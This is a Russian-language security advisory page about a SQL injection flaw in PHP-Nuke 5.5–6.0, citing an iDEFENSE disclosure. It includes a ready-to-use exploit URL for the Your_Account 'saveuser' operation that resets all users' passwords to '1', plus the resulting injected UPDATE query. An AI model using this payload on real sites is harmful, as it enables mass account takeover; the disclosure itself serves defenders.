Security Lab

Изменение SQL запроса в PHP-Nuke

Дата публикации:04.11.2002
Дата изменения:17.10.2006
Всего просмотров:1933
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: PHP-Nuke – система управления контентом, написанная на PHP.

PHP-Nuke уязвим к нападению SQL injection, которая позволяет атакующему изменять существующий SQL запрос и модифицировать информацию в базе данных. Следующий пример изменит все пароли пользователей PHP-Nuke на ‘1’. Эксплуатация требует, чтобы атакующий вошел в систему и определил свой UID, просматривая код страницы. Если UID атакующего равен 2, то он может начать нападение, запрашивая следующий URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage= no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

Введенный запрос построен следующим образом:

 
PDATE nuke_users
   SET name         = '',
       email        = '',
       femail       = '',
       url          = 'http://',
       pass         = 'xxxxx',
  +--[ bio          = '\',
  |    user_avatar  = '',
  |    user_icq     = '',
  |    user_occ     = '',
  |    user_from    = '',
  |    user_intrest = '',
  |    user_sig     = '',
  |    user_aim     = '',
  |    user_yim     = '',
  |    user_msnm    = '',
  +--[ newsletter   = ',
       bio=0,pass=md5(1)/*' WHERE uid='2'
уязвимость обнаружена в PHP-Nuke 5.5-6.0
Ссылки: iDEFENSE Security Advisory 10.31.02c: PHP-Nuke SQL Injection Vulnerability